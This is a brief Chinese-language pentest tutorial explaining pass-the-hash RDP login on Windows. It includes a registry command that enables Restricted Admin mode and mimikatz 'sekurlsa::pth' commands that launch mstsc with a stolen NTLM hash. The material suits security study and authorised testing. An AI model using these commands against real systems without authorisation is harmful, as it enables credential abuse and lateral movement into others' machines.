mimikatz-pth with rdp

在对Windows系统进行渗透测试过程中，如果获取目标机器的系统权限，则可以通过hashdump的方式获取目标机器历史登录信息，包括用户名和用户明文密码或者用户hash，如果无法直接获取目标用户明文密码，则可以通过pth的方式远程登录目标机器

通过pth的方式远程登录有一个限制：受限管理模式(Restricted Admin mode)

• Windows8.1和Windows Server 2012(R2)默认支持该功能
• Win7和Windows Server 2008(R2)默认不支持该功能，需要安装补丁KB2871997和KB2973351

开启受限管理模式

推荐采用第二种方式，尤其在获取目标系统权限之后，通过cmd交互，可以轻松关闭受限管理模式

1. 安装补丁KB3126593

对应微软补丁KB3126593，其原理与下述的修改注册表的原理是一致的

1. 修改注册表(推荐)

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa

新建DWORD键值DisableRestrictedAdmin，值为0，代表开启;值为1，代表关闭

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

通过用户/Hash进行远程登录

1. 使用攻击机自己的用户及Hash进行远程登录

mstsc.exe /restrictedadmin

如果当前系统支持受限管理模式，则上述命令执行后会直接弹出远程登录的登录界面；如果当前系统不支持受限管理模式，则上述命令执行后会弹出远程桌面的参数说明

如果上述命令顺利执行，输入目标机器的IP和端口，可直接进行远程登录，不需要输入任何口令，这种方式会使用当前攻击机的用户名和用户hash尝试登录目标机器

1. 通过pth进行远程登录(mimikatz)

# 管理员权限下执行以下命令:
mimikatz# privilege::debug
mimikatz# sekurlsa::pth /user:目标机器的用户名 /domain:目标机器的域(工作组则为.) /ntlm:用户名对应的hash "/run:mstsc.exe /restrictedadmin"

整体思路

1. 通过hashdump(系统权限)或者其他漏洞获取目标机器的用户hash(能直接获取明文密码的直接结束)

2. 开启Restricted Admin mode

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

1. 判断目标机器是否对外开放rdp的3389(默认端口)，如果没有则需要进行端口转发或者代理转发，如果是内网无法访问外网，则可以通过端口复用的方式完成端口转发

2. 通过pth进行远程登录(在攻击机上执行)